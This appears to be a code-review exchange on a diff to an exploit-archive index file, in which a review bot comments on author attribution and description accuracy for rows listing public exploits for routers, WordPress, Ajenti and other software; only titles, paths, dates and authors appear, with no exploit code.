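Review bot: 47493 credits only `Kusol Watchara-Apanukorn`, whereas `exploits/windows/local/47493.txt` lists three authors (Kusol Watchara-Apanukorn, Pongtorn Angsuchotmetee, Manich Koomsusi); if the index convention is one author per row, the file header should match, otherwise the other two names belong in the quoted author field.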

@ -41822,3 +41825,6 @@ id,file,description,date,author,type,platform,port
47483,exploits/hardware/webapps/47483.py,"TP-Link TL-WR1043ND 2 - Authentication Bypass",2019-10-10,"Uriel Kosayev",webapps,hardware,80
47491,exploits/hardware/webapps/47491.txt,"Intelbras Router WRN150 1.0.18 - Persistent Cross-Site Scripting",2019-10-11,"Prof. Joas Antonio",webapps,hardware,
47492,exploits/php/webapps/47492.rb,"WordPress Arforms 3.7.1 - Directory Traversal",2019-10-11,"Ahmad Almorabea",webapps,php,
47496,exploits/php/webapps/47496.txt,"Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting",2019-10-14,"Debashis Pal",webapps,php,
47497,exploits/python/webapps/47497.py,"Ajenti 2.1.31 - Remote Code Execution",2019-10-14,"Jeremy Brown",webapps,python,
47498,exploits/php/webapps/47498.txt,"Kirona-DRS 5.5.3.5 - Information Disclosure",2019-10-14,Ramikan,webapps,php,
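Review bot: 47498 is described as `Information Disclosure` only, but `exploits/php/webapps/47498.txt` documents two CVEs, CVE-2019-17504 (reflected XSS / HTML injection in /osm/report/) and CVE-2019-17503 (REGISTER.cmd exposure), so the row undersells half of its content; 'Multiple Vulnerabilities', which the author's own reference title uses, would be more searchable. The 2019-10-14 dates in these three rows are submission dates rather than the `# Date:` values in the files (2019-10-13 and 2019-10-03), which is consistent with the rest of the index.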